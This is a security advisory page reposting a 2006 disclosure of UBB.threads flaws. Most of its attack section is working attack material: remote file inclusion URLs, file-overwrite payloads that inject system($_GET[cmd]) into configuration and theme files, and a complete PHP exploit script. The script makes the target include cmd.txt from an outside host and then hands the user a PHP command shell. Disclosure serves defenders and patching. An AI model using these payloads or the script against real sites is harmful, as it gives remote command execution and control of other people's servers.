|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1676 CVE : CVE-2006-5138 CVE : CVE-2006-5137 CVE : CVE-2006-5136 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : HACKERS PAL Published : 04.10.2006
Advisory Content : Hello,, UBB.threads Multiple input validation error Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net [email concealed] Tested on Version 6 (6.5.1.1) and other versions maybe affected Remote File including : ubbt.inc.php?GLOBALS[thispath]=http://localhost/cmd.txt?&cmd=dir ubbt.inc.php?GLOBALS[configdir]=http://localhost/cmd.txt?&cmd=dir ------------------------------------------------------- Files overwrite vulnerabilities if magic_qoutes_gpc = off admin/doedittheme.php?theme[soqor]=".system($_GET[cmd])."&thispath=../ and open includes/theme.inc.php?cmd=ls -la or :- admin/doeditconfig.php?config[soqor]=".system($_GET[cmd])."&thispath=../ and open includes/config.inc.php?cmd=ls -la -- # -- # -- # -- if magic_qoutes_gpc = on admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.g ooglepages.com/cmd.txt? and you will have a command execution files .. example dorateuser.php?cmd=ls -la calendar.php?cmd=ls -la and so many other files which includes using this variable ($config[path]) ------------------------------------------------------- Full path cron/php/subscriptions.php ------------------------------------------------------- Exploit :- #!/usr/bin/php -q -d short_open_tag=on <? /* /* UBB.threads Multiple vulnerabilities /* This exploit should allow you to execute commands /* By : HACKERS PAL /* WwW.SoQoR.NeT */ print_r(' /**********************************************/ /* UBB.threads Command Execution */ /* by HACKERS PAL <security (at) soqor (dot) net [email concealed]> */ /* site: http://www.soqor.net */'); if ($argc<2) { print_r(' /* -- */ /* Usage: php '.$argv[0].' host /* Example: */ /* php '.$argv[0].' http://localhost/ /**********************************************/ '); die; } error_reporting(0); ini_set("max_execution_time",0); $url=$argv[1]."/"; $exploit="admin/doeditconfig.php?thispath=../includes&config[path]=http: //psevil.googlepages.com/cmd.txt?"; $page=$url.$exploit; Function get_page($url) { if(function_exists("file_get_contents")) { $contents = file_get_contents($url); } else { $fp=fopen("$url","r"); while($line=fread($fp,1024)) { $contents=$contents.$line; } } return $contents; } $page = get_page($page); $newpage = get_page($url."calendar.php"); if(eregi("Cannot execute a blank command",$newpage)) { Die("n[+] Exploit Finishedn[+] Go To : ".$url."calendar.php?cmd=ls -lan[+] You Got Your Own PHP Shelln/* Visit us : WwW.SoQoR.NeT */n/**********************************************/"); } Else { Die("n[-] Exploit Failedn/* Visit us : WwW.SoQoR.NeT */n/**********************************************/"); } ?> WwW.SoQoR.NeT  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |